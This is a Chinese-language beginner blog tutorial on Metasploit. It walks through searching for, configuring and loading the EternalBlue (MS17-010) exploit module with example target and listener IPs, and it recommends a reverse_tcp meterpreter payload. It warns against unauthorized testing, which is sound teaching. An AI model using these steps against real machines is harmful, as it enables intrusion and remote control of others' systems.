新手怎么用MSF查漏洞?看这一篇就够了!MSF入门教程,新手快速掌握漏洞利用技巧


​刚接触渗透测试,面对一堆漏洞代码是不是头大?​
别慌!今天手把手教你用Metasploit这个"黑科技武器库",像查字典一样轻松看透漏洞老底。咱们不整虚的,直接上实战案例,包你三分钟学会查漏洞、看参数、避大坑!


第一步:翻"漏洞字典"的正确姿势

​打开你的MSF控制台,先整明白这几个命令:​

  • search命令是放大镜​​:输入search ms17-010,立马跳出永恒之蓝相关模块(别小看这个,去年还有企业栽在这漏洞上)
  • use命令是传送门​​:看到exploit/windows/smb/ms17_010_eternalblue这种路径别怂,直接复制粘贴use后面接路径就能钻进去
  • info命令是说明书​​:输入后蹦出来的英文别慌,重点看这几个参数:
    • Rank危险等级​​:看到excellent就偷笑吧,成功率超高
    • Targets适用系统​​:写着Windows 7 SP1 x64的千万别拿去怼Win10

举个栗子🌰:

msf6 > search ms17-010   # 搜索永恒之蓝模块msf6 > use 0             # 选第一个利用模块msf6 > info              # 查看详细信息

第二步:破解"天书"的关键参数

info命令返回的信息量爆炸?咱们挑重点看:​

参数名作用新手常见坑点
RHOSTS要攻击的目标IP忘设置这个等于拿枪不装子弹
RPORT服务端口号(445是SMB默认口)扫到开3389端口的别往445怼
PAYLOAD攻击成功后植入的后门类型新手建议用meterpreter稳如老狗

​举个血泪教训:​
上次有个兄弟把RHOSTS设成自家路由器IP,结果把自己网搞崩了...记住啊!​​测试前先拿虚拟机练手​​,别拿生产环境开涮


第三步: *** 私藏的高级技巧

​Q:参数设置完了还是报错咋整?​
A:试试这三板斧:

  1. show options复查参数​​:看哪个Required项还标着红色no
  2. set VERBOSE true开启唠叨模式​​:让系统把报错细节吐干净
  3. check命令先探路​​:部分模块支持预检查,避免真刀真枪翻车

​Q:模块太多记不住怎么办?​
送你个过滤口诀:

  • search type:exploit​ 只看攻击模块
  • search platform:windows​ 专筛Windows漏洞
  • search name:ssh​ 精准定位SSH相关

第四步:永恒之蓝实战查漏洞

咱们用经典漏洞MS17-010走个流程:

  1. ​搜索模块​
    msf6 > search eternalblue# 看到exploit/windows/smb/ms17_010_eternalblue记下编号  
  2. ​查看详情​
    msf6 > use 0msf6 > info# 重点看Disclosure Date是2017-03-14,超过5年的漏洞要小心防护  
  3. ​配置参数​
    msf6 > set RHOSTS 192.168.1.100  # 目标机IPmsf6 > set LHOST 192.168.1.200  # 你的攻击机IP  
  4. ​查看可用载荷​
    msf6 > show payloads# 选windows/x64/meterpreter/reverse_tcp这种稳定版本  

小编观点时间

玩转MSF查漏洞就像学炒菜——​​火候掌握好了是厨神,乱搞就是炸厨房​​。建议新手牢记三点:​​永远先查info看适用范围、测试前虚拟机里试水、用完记得back退回主界面​​。最近发现不少人在公网瞎扫端口,再次强调:​​未经授权的渗透测试可是违法行为​​!咱们学技术是为防御,可不是当脚本小子搞破坏啊~